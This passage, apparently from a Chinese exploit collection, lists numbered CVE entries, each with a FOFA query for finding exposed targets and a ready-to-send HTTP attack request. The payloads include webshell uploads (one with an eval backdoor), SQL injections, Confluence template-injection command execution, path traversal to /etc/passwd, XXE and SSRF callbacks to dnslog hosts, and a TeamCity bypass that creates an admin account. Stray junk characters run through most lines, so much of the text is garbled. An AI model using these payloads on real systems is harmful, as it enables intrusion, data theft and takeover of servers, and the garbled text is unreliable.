) T) R' ^% Z, d# gX-Remote-Addr: 1.1.1.1
) j* k6 X/ }, b8 U" T4 }Te: trailers
5 ?( Q6 r$ ~0 ?Connection: close
+ t) j, L7 `5 L1 y2 N! O! ?: @$ Y/ K1 _; Y) [( G, n
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
9 o: {4 H# t! d. h( ^8 Y
. }. ~7 ~% S- G6 ?: b' [" K9 Z/ o k
$ ?3 a% i/ m# c2 p. f120. 北京百绰智能S40管理平台导入web.php任意文件上传, a8 n, W) F! e2 I; f# t% K' |
CVE-2024-12534 s; s2 G4 j$ d' P% N7 r2 O
FOFA:title="Smart管理平台", |9 X: R$ K- m4 k) K
POST /useratte/web.php? HTTP/1.1- ?, F5 k8 U7 g
Host: ip:port0 b7 I2 `8 H2 k/ U
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
8 W3 E2 X; F+ n) e% f5 lUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko3 @; e( i* V; O0 w: Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ X) S2 q6 W& a' V4 A) A" s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: t/ L( N( r9 h. s$ p' Z( zAccept-Encoding: gzip, deflate
$ ^9 d2 x2 |2 E# k5 c! mContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328: j8 X5 ^- H# V
Content-Length: 597' c5 X, `! c$ `8 G0 b1 j1 k+ E
Origin: https://ip:port+ ^% u' B1 P! k( }% Z1 V7 X$ {
Referer: https://ip:port/sysmanage/licence.php+ G: p/ b' J; z; g
Upgrade-Insecure-Requests: 1
5 Q2 r' ], e. l) e: YSec-Fetch-Dest: document% u- t: t( \+ c
Sec-Fetch-Mode: navigate
+ ]/ w3 C/ L% o9 R/ WSec-Fetch-Site: same-origin( e3 v1 V9 [; c
Sec-Fetch-User: ?1
# q6 R7 T5 I/ PTe: trailers
0 y; j e: _! Y$ R1 OConnection: close6 w6 H+ z, j3 @2 b. W3 v. D4 T
& l* {% |) {1 g& q, e# J-----------------------------42328904123665875270630079328: D4 ?: X# T7 s) ]- Z4 p
Content-Disposition: form-data; name="file_upload"; filename="2.php"
- ^3 r. n' h) n N8 ^$ g7 e2 yContent-Type: application/octet-stream- h* O, Y5 s; M' H& {$ |1 |! }
2 E. k+ v* h$ c F6 R4 ]
<?php phpinfo()?>3 p# Q$ |, {; s/ D& F
-----------------------------42328904123665875270630079328
9 s7 a ]* M( y0 PContent-Disposition: form-data; name="id_type" |0 e; U1 o0 a& @
; v v) J' v6 I6 I- V+ H1- q. E& G) i4 \% n1 L
-----------------------------42328904123665875270630079328
6 j) v# T- Q5 e2 _Content-Disposition: form-data; name="1_ck"
+ Z) l! V1 p6 U/ U1 `- o0 r
# }1 E! ^0 p4 B/ v# v" B7 V4 `' v1_radhttp2 o% T( Y) x8 ^: B5 q
-----------------------------42328904123665875270630079328- I" I! Q% O& k' F! g; Q& z7 o
Content-Disposition: form-data; name="mode", J, d. T/ C: f
3 s2 j0 P$ O. t/ S0 o& ^# v$ f& ?
import; v: i. j# K% J, }" \/ T
-----------------------------42328904123665875270630079328
" k$ o, r0 G+ R1 Q: F9 { E2 j' D R9 a0 \
% w9 p( \( g; L r' @1 n$ f% L7 s& O; @
文件路径/upload/2.php/ a& {0 G: D9 W$ q+ E
! X/ D0 l9 O6 B* }, ?1 |8 D3 ?, i
121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 R( X: c g3 a: B* S2 g
CVE-2024-1918
* g$ ^" A! s: W& a- z, f! l6 U: CFOFA:title="Smart管理平台"
+ T% `* g$ r) z9 t3 W+ yPOST /useratte/userattestation.php HTTP/1.1
3 U! _2 t1 l7 S* ?Host: 192.168.40.130:8443
4 Y+ Z, H* T) J3 F; \Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
' ~# c" ?( W! h3 ]: LUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko% g9 S, N" ~; A; e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, ^. [/ l3 C D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 z4 ?, W: P7 r8 W* P: a8 i$ W, p' C0 D
Accept-Encoding: gzip, deflate' S3 E3 i6 L+ G8 b- @( c; |
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328+ a/ o; a q3 U8 J& p, s3 y
Content-Length: 592# `6 i4 r% x( ]/ _7 X2 z
Origin: https://192.168.40.130:84439 i" m5 n+ ?" T8 f- ~
Upgrade-Insecure-Requests: 1) E' [: j( ]* B% i( {
Sec-Fetch-Dest: document
) ]7 s( K: M8 A9 NSec-Fetch-Mode: navigate; l/ B$ o! I/ ]- O; } j
Sec-Fetch-Site: same-origin
* p8 V! v: W! l" ]( J1 qSec-Fetch-User: ?13 ?/ z* L8 H+ l/ M% ?" k
Te: trailers+ F0 N/ U% X5 M1 p5 Z P
Connection: close
: E3 n1 ?; {; r* S0 L% {/ f, o' c' O2 F+ p; i
-----------------------------42328904123665875270630079328+ g5 ^: G# J9 \9 f* r1 K% D8 y0 h
Content-Disposition: form-data; name="web_img"; filename="1.php"
3 l6 \7 S: f( w- U- N' [8 k3 nContent-Type: application/octet-stream! g: n: ~9 P: `9 k
2 u, b E! c% [) _8 q3 \# }: q; O* X
<?php phpinfo();?>9 ] I! ^4 }- w1 u1 t8 o
-----------------------------42328904123665875270630079328% t' V- J8 l8 o/ e$ B+ d7 y/ Z
Content-Disposition: form-data; name="id_type"( @% X. G/ O4 ~8 @* g( ^
x5 I P% |" o( C1
; V# S: g2 Y5 D-----------------------------42328904123665875270630079328( @" ^% j) C# \" @
Content-Disposition: form-data; name="1_ck"
6 n1 N" A3 O7 C; H( s O( E' D' H5 ~- l" O) I S! _+ c$ Q; u' E7 N# ~1 i
1_radhttp* t, _: o3 m4 w
-----------------------------423289041236658752706300793281 G+ d! L: `# {5 L+ u3 N
Content-Disposition: form-data; name="hidwel". v% V0 }2 E g# U6 |8 \1 {/ w4 I
- t! g1 g( ?. t
set
# N! Z$ _8 c& N8 Z-----------------------------42328904123665875270630079328. j: b4 H9 h. }# Q7 N! \+ c
! w+ [0 _: t8 i4 l8 Q
i7 M% o, w4 N' ]$ I. a9 Yboot/web/upload/weblogo/1.php6 ]0 S- l) b; a b
4 Z$ S3 V- r* g9 r% \0 _122. 北京百绰智能s200管理平台/importexport.php sql注入
1 e# |8 J% Z/ P' f7 R: [CVE-2024-27718FOFA:title="Smart管理平台"7 B+ [3 W$ G2 L5 N7 j2 u
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
0 D; n* L* k1 I6 IGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
* C5 J3 N! Y# g8 @# ~8 q9 [* T. fHost: x.x.x.x) l+ |# m2 {8 q# K' {7 V
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc05 L) M- D! t, b& x# |' L( T' V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 b7 q1 t- y1 U6 U1 }1 W: n7 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( T" e% h' q' L+ m. QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 ?; H1 Y8 q/ p9 B5 x X
Accept-Encoding: gzip, deflate, br
* E; [3 D: I2 ]6 k3 G. g; n N. iUpgrade-Insecure-Requests: 1
, w/ o7 z$ [! ?! L* K0 F- FSec-Fetch-Dest: document
6 p3 p3 |2 `8 U" L6 hSec-Fetch-Mode: navigate; K |5 k* A; h% u) q
Sec-Fetch-Site: none6 p* G: B1 F1 V& h4 j
Sec-Fetch-User: ?1
8 m/ O$ {' [7 sTe: trailers
& u" K2 O: _" F8 a0 c; }6 ~Connection: close
4 V3 S& X% }4 D5 u
( g9 D( E+ Z) }* N
3 C* d3 q" R% d% L4 e, j. }123. Atlassian Confluence 模板注入代码执行0 ?. w: x2 L, X5 Z8 ]# p
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"9 T% `) p4 F0 n- k
POST /template/aui/text-inline.vm HTTP/1.1 x+ G- ?2 ^* N% i! _" A u, m
Host: localhost:8090, N; a* W/ d1 i; O1 U6 o6 O2 f5 x
Accept-Encoding: gzip, deflate, br
$ z% j! t' i2 ^9 RAccept: */*+ y4 V1 q2 n$ Y% \* f
Accept-Language: en-US;q=0.9,en;q=0.89 {& C' v1 X/ ^! ]% H% l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
T2 h) d# C# _; ?7 m+ W( ?( V0 _Connection: close
# O# ]7 b1 k2 ]. R( _6 YContent-Type: application/x-www-form-urlencoded
* B b/ Q8 v$ b6 p1 H. }$ t( e$ y8 z( }/ n2 n' a
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})), F( \6 S5 ?0 d5 |0 r! |
- t% i$ I( h* v3 W4 _" d) I$ p, d9 e+ q. T& O1 U
124. 湖南建研工程质量检测系统任意文件上传8 W7 V" E& M& u$ P3 j
FOFA:body="/Content/Theme/Standard/webSite/login.css": y7 ?6 D# r' F% ~( u
POST /Scripts/admintool?type=updatefile HTTP/1.1
/ a" G, h9 D% p( GHost: 192.168.40.130:8282$ G6 D' \: p8 P. I+ f- s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ s$ K5 ?8 s: u1 ?# u0 \
Content-Length: 72
7 _( y2 P$ P' T& xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8$ m6 h5 A$ k! r5 \7 ^% V7 q# m
Accept-Encoding: gzip, deflate, br. ?5 g7 y' z6 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( h' g) N( B5 x
Connection: close
8 A8 S4 h/ v, ^+ W3 Z$ VContent-Type: application/x-www-form-urlencoded' L1 i/ s0 }3 R0 s6 R$ ]
6 x$ E# G4 C q* SfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
+ n4 j2 a3 }' [0 q5 D) T! O& \# z4 l
6 J5 P+ b4 I8 W9 y0 P# o% e5 E! V) |% u1 I
http://192.168.40.130:8282/Scripts/abcgcg.aspx
+ ~# v7 n9 J$ ]2 |7 X
$ |# e9 I- B1 O% w) R125. ConnectWise ScreenConnect身份验证绕过
4 R! H% |; V8 j% P7 ]CVE-2024-1709
$ u8 K, ^4 F3 y/ kFOFA:icon_hash="-82958153"% t" D" ?& y5 `
https://github.com/watchtowrlabs ... bypass-add-user-poc Y0 B7 h8 m, ?
+ e1 h5 ~0 p- M4 P4 r) ?8 ]* ]6 ~
使用方法$ K( w+ N! @. E6 S% F
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!) X T9 j: c+ W% V/ N! L# V
9 W, F+ ]. r. ~8 B& }+ r8 S. g; |9 q
. w1 W+ c& V* d! Y
创建好用户后直接登录后台,可以执行系统命令。
3 C+ m9 ?& E, x e Y3 h
+ e8 e; _ f# A9 P126. Aiohttp 路径遍历
p$ @) \" y0 mFOFA:title=="ComfyUI"0 N# C) A9 w" x3 c3 I, Z
GET /static/../../../../../etc/passwd HTTP/1.1* G. c. j; j! Z6 H) }7 M' O9 ~
Host: x.x.x.x; [1 @3 e0 A3 c8 @+ Q% i) G3 e: Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( W& W8 G. m' C
Connection: close( c8 y, f# u7 n: k* w
Accept: */*: M/ j! N0 B+ o: r5 H0 n$ K/ Y
Accept-Language: en
( y$ ]; H" J0 @Accept-Encoding: gzip
7 y$ g8 V6 a1 R0 ^" x/ F4 p) s# G, a7 N
# G4 [& ?8 \7 ?! o5 L! Z y& X p127. 广联达Linkworks DataExchange.ashx XXE7 q0 X) Z# |/ r3 c f7 Y
FOFA:body="Services/Identification/login.ashx" ; n- D( d0 Q* c& g1 h+ Y5 O
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
/ a3 N% H p) y. J% Z0 O C+ gHost: 192.168.40.130:8888/ s: `& r% V* W9 W4 x3 ` p1 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.366 J f6 C5 ?( D+ Y. W! u8 L
Content-Length: 415
' y7 `" }! l& Z4 @& ]5 F% iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% `4 K! A% s3 _
Accept-Encoding: gzip, deflate
5 j8 S* W G. @; iAccept-Language: zh-CN,zh;q=0.9+ X. g. [. l/ F" x" @1 o. T( p
Connection: close
9 k O8 {$ `0 b7 }! s2 {Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
* p( M" {4 S1 D& KPurpose: prefetch
4 K5 Q6 r- G: D$ I' x: SSec-Purpose: prefetch;prerender3 T! b+ ]/ I3 [9 I
" `+ [8 q6 O$ k+ `7 p5 o
------WebKitFormBoundaryJGgV5l5ta05yAIe0, _( ~- Z$ K& ]% w3 U/ c3 y; r' P
Content-Disposition: form-data;name="SystemName", _* x( D# |5 ~7 u& S) }
" M1 T- M, f7 R& dBIM; i' C! s: L& V4 N% x
------WebKitFormBoundaryJGgV5l5ta05yAIe0, s+ w. p7 p; T3 z' u
Content-Disposition: form-data;name="Params"
\: K8 M' t8 L4 d$ HContent-Type: text/plain
6 {0 ]! l8 D' I, Q; e+ W9 |0 y+ x/ i& u- h2 X( ?
<?xml version="1.0" encoding="UTF-8"?>5 q: T. b( y3 y3 E* e$ [" S3 A
<!DOCTYPE test [# U# P: k. ~6 O
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">5 c2 @5 u4 c( k4 }8 m6 `. f2 L% L% ]
]
1 g! K; E9 h% ?& [" d/ G>0 m" }! |4 ?3 J( }$ h3 `- q1 I
<test>&t;</test>3 K- G: r$ J& M* {" g% X
------WebKitFormBoundaryJGgV5l5ta05yAIe0--1 w. c! U( p/ z' }# s |8 S
: Z6 U" n0 }5 R) e
D5 T1 j# L' F! Y" T4 @
6 c* @3 |5 o" g! L0 P128. Adobe ColdFusion 反序列化
) Q( v a) K/ M8 f& Y& ^CVE-2023-38203, }7 n' f* W J( Q& l2 N
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本): b" e! C1 G, Y" [
FOFA:app="Adobe-ColdFusion"* v/ X w% b( o
PAYLOAD
8 Z9 P4 p" m6 m2 f; N0 K! H
* _3 B6 j( d5 l) L( p/ `129. Adobe ColdFusion 任意文件读取
# g5 }, S5 P+ v7 \- g, uCVE-2024-20767
* _- b+ M0 l( G! s! R) p s9 VFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
% x2 n5 d1 L x7 c; R, O1 g第一步,获取uuid, o3 l; U: M/ m
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
+ d$ `( @6 {6 N" n2 jHost: x.x.x.x+ ^3 ]2 u1 [: z4 ?7 A5 T- m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" ?( w1 t$ Y: h) Y& F6 Y# Z* z7 o: kAccept: */*
$ m, e8 \6 Y8 I6 P) d2 bAccept-Encoding: gzip, deflate9 g$ C1 ^6 S( t, z; W
Connection: close
9 D& F6 X# u& m9 @7 f& ~ z# O: f; A: l' }7 p4 f+ J
* I, ?. Z* E4 E
第二步,读取/etc/passwd文件
! _8 E& z3 a6 Y7 `GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
' U# D: J' a0 T* V1 P( E- QHost: x.x.x.x
" Z* p4 e, |4 I+ @" x9 z' }- MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% d% J8 p8 j0 V2 i0 \6 qAccept: */*7 f7 {: Y$ D: ]& W6 _* K+ l
Accept-Encoding: gzip, deflate
# O- [) }3 e# M' T* T, X+ DConnection: close
' E# s- H; b1 ?uuid: 85f60018-a654-4410-a783-f81cbd5000b9' B) ?" u' }' h( a9 j
6 }, B$ X6 I- S4 k
! ~, K8 {( ~+ a W! |, C9 ]130. Laykefu客服系统任意文件上传
7 V8 |3 Y; Q6 k4 u3 G6 B, [FOFA:icon_hash="-334624619"
@4 c% s9 A: l* X W$ EPOST /admin/users/upavatar.html HTTP/1.1
8 I; A% F$ ~; w9 y8 a! tHost: 127.0.0.1/ D6 C# D7 @, M! Y7 Z2 D8 s
Accept: application/json, text/javascript, */*; q=0.01& W0 t- {. @/ C3 z
X-Requested-With: XMLHttpRequest
- c& f# d, k" w) m) K) ]User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/ U+ V; j, U4 z$ X! S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR9 d' k# {* \0 O( k$ c
Accept-Encoding: gzip, deflate
( M J4 P$ o4 ]Accept-Language: zh-CN,zh;q=0.9* {2 ~/ v, s" d* s
Cookie: user_name=1; user_id=3% s/ N* S) E& {
Connection: close
4 K* J4 q, ~6 q1 Y) A- l
! b! O2 E" t4 M# @0 U------WebKitFormBoundary3OCVBiwBVsNuB2kR
# v) @. [5 G+ } g9 C; c7 lContent-Disposition: form-data; name="file"; filename="1.php") |$ g/ z" K* V% ^4 k
Content-Type: image/png* y; d' c3 L) \8 A) M5 ~
9 J! i( D2 q9 k+ l$ J) j* }<?php phpinfo();@eval($_POST['sec']);?>
* {! o! J7 a) }4 o------WebKitFormBoundary3OCVBiwBVsNuB2kR--
+ N8 y/ h2 O, I8 b, Q! _1 T0 P' X7 G$ t6 F6 U* A7 e& ~; L; B) e9 a
& _4 R5 M3 c# B$ A/ K; z
131. Mini-Tmall <=20231017 SQL注入: f! D; J+ B+ q, t& E
FOFA:icon_hash="-2087517259"
9 h9 m/ Z. j9 n7 `# m2 D后台地址:http://localhost:8080/tmall/admin* J; M2 I9 Q/ R9 i& T
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)) J. h) i! m8 n
$ B# W5 }. ^) S, J132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
# l- J! Z& d2 }CVE-2024-27198
D! x7 ?4 |0 o7 n& G/ JFOFA:body="Log in to TeamCity"
8 x6 m! ~+ D+ k/ ^ J- nPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
+ x! b. y* ^. C( S$ SHost: 192.168.40.130:8111
- ?9 ^1 X, J3 k9 F- mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% }- q- o' p3 U3 n
Accept: */*
7 m) n f, i( j* ]% y- kContent-Type: application/json
3 a4 ?: Y, c& |" H. q9 XAccept-Encoding: gzip, deflate
2 f! M+ u0 D! t6 m+ N# S1 ]& Q' ^7 A7 K# O1 g- p1 {# F
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}/ E. J" r+ {4 |6 P. r( A
' r# m% C! a% I) h' r9 |# r7 n/ @# _ }6 K% b4 n4 f6 k% j6 T
CVE-2024-27199( |* ]# n$ ?, t* Q; y
/res/../admin/diagnostic.jsp7 j. T+ M! {/ h8 v1 x
/.well-known/acme-challenge/../../admin/diagnostic.jsp- x I# \& l0 I
/update/../admin/diagnostic.jsp
+ c6 s/ v+ Z* L) ?5 F. { K4 V- }% t, x. \0 g5 e
" v# p2 l( y5 T: B, e O( z9 a& A# R3 Z, S
CVE-2024-27198-RCE.py
' n2 E; c- @' \$ m5 D9 a+ P5 U9 r2 `- Q7 f
133. H5 云商城 file.php 文件上传
, f4 M; w$ A6 l' e" R# uFOFA:body="/public/qbsp.php"
/ T B% a* o% v g; W; ?0 {POST /admin/commodtiy/file.php?upload=1 HTTP/1.17 _, U" U* T; \' T! Z1 b: F
Host: your-ip
c2 D0 _) [) {$ I" XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.368 E5 T1 f" Q' ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
4 h9 T" {% ?4 s4 Y, c0 P0 ?' ~) M0 @% m5 q# n) s
------WebKitFormBoundaryFQqYtrIWb8iBxUCx: D+ s& Q8 x/ C+ y
Content-Disposition: form-data; name="file"; filename="rce.php") g- v7 Z# \! M
Content-Type: application/octet-stream- Z' Q9 @) l! _* \2 x
. }. s+ o) w, h, e0 Z4 r+ E. M4 t<?php system("cat /etc/passwd");unlink(__FILE__);?>/ l# w; K6 ^3 i
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--+ f( u! F. D; Q( a, O5 Q
2 J& N2 |& W F% y) }9 c3 O* _+ A: O, G
N r7 r% p p4 l5 a+ @# e
134. 网康NS-ASG应用安全网关index.php sql注入
. b& p" c) V p( |2 X$ J! ACVE-2024-2330
+ v, S) T5 R, f" LNetentsec NS-ASG Application Security Gateway 6.3版本8 y/ I3 x p, u9 V
FOFA:app="网康科技-NS-ASG安全网关"
; V4 t3 Q6 \/ X z) CPOST /protocol/index.php HTTP/1.1; ]5 l, F, I/ m' W$ Y
Host: x.x.x.x- V) q# z) P+ I- w
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
% E! Q; j u L( B' K" vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- T) a9 @, }- ^. x8 J1 aAccept: */*
1 L/ Q- m! g( [( xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) O0 @$ K4 f- L0 E' p" rAccept-Encoding: gzip, deflate8 ^) i* \, i( J/ v2 ]. \
Sec-Fetch-Dest: empty- q6 |. h/ m* _# s! ?
Sec-Fetch-Mode: cors& q, O! \8 |2 P& ^: A
Sec-Fetch-Site: same-origin
( ]4 x$ g# G7 e4 }: r' GTe: trailers
# c: P) m9 ^9 bConnection: close
4 ~# [7 h* a) N! PContent-Type: application/x-www-form-urlencoded
$ f3 Q* h& v6 }5 \7 `4 SContent-Length: 2632 d' C$ x. C. n4 r( P
! U+ B }3 L' h9 U( `& j5 k( z+ _jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
8 N% \( z* ]+ C5 h/ n; s# `/ J3 D$ X& W9 Q! j4 ~ u7 |! s4 {2 p
! q2 W5 ~( h4 G2 ^3 x
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
/ C6 z' V3 b! h4 ~6 ]CVE-2024-2022
7 P! R4 E% O+ zNetentsec NS-ASG Application Security Gateway 6.3版本# T+ e4 z# x/ B/ q$ Y
FOFA:app="网康科技-NS-ASG安全网关"% N. x) b; G0 {. W2 a( A
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
# O- g( [# Z' i' U+ eHost: x.x.x.x# y: _- ]2 r, s+ j! z- H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
G: g$ U# i9 k& k* q- m- DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, r7 v* ~3 U* C& T& @
Accept-Encoding: gzip, deflate* i" _( ]$ O2 o3 c
Accept-Language: zh-CN,zh;q=0.9
: g C% B# m/ E/ N1 Z+ B+ d- e, ^2 ?Connection: close
- s8 L( @+ [, t% A* x# D0 I$ k& m7 @
: o0 D; R% o8 O, x2 ^9 T, `6 S# l/ z2 H
136. NextChat cors SSRF
: H6 e4 k8 w8 i; \6 O5 g) MCVE-2023-49785
8 n# j M7 a2 I; [- n/ _FOFA:title="NextChat"5 {. k8 `( s) B$ n2 j |9 D
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1: O7 ~8 q' P8 {5 y+ T j# r2 \8 C% ~9 i
Host: x.x.x.x:10000) S; e1 d7 }. N3 W6 ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
D4 j* {5 C) _1 z7 T6 ?- M+ zConnection: close& J/ {' n* w- w7 m
Accept: */*6 i+ Y3 C8 z# z6 A+ q+ b
Accept-Language: en
* m0 M. w( z; x) q, _ [Accept-Encoding: gzip; f t! r7 J) C. S
, o5 q$ M" c* h" N& U- N/ |* x: T' W, O) P4 E9 t" V* ^2 V
137. 福建科立迅通信指挥调度平台down_file.php sql注入3 _7 P: S/ u5 k
CVE-2024-2620
9 v9 x$ c4 m4 mFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; r" Z: r s+ b Z) rGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1/ D# T9 q' c. D# T
Host: x.x.x.x2 n& g5 O. h; {, S0 h! [, q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
e3 n. f. a* B9 r3 M; c/ AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 u. b. ^4 F/ m aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Q- A q. ]( i! ~5 p& U& a# Q4 @+ n0 KAccept-Encoding: gzip, deflate, br v6 V9 i4 f9 m( S! O3 N ?& p7 n
Connection: close8 m- r4 q9 C( C/ ^ |' l8 i( Y# h
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
& R- j% [5 o: M# G1 vUpgrade-Insecure-Requests: 1: E2 L9 K9 j4 B' z) Z
( Q7 L' U7 E3 @2 s9 ~
! L$ t" q7 z, j8 q9 D: E9 C
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
" d+ y1 L( x$ z' M5 yCVE-2024-2621
! ~# P( R6 s$ X1 [! L% uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: c3 n; C$ U' `1 S+ p! c; @2 Q7 nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.17 x- ~1 Q8 N( O+ n7 l
Host: x.x.x.x! d/ _& z' ?2 t7 T: ~9 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* X* [) Y: r9 q) g' o1 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! w: p! A1 @ u$ g, k* K+ m& {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 `' O) P) w4 R7 H
Accept-Encoding: gzip, deflate, br
G) V7 k* {' n. W. BConnection: close
& l: ^# |; o) @) _9 e! ]5 hUpgrade-Insecure-Requests: 1# t+ \% Q$ w$ {/ T) N
8 g4 X* A9 X1 q; ?9 t5 j% m
" V0 v3 L9 t7 \, V139. 福建科立讯通信指挥调度平台editemedia.php sql注入
7 r4 Y. ~ k8 m: o2 B3 L; VCVE-2024-2622& n5 }, s; _* z) f' y1 a7 N
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
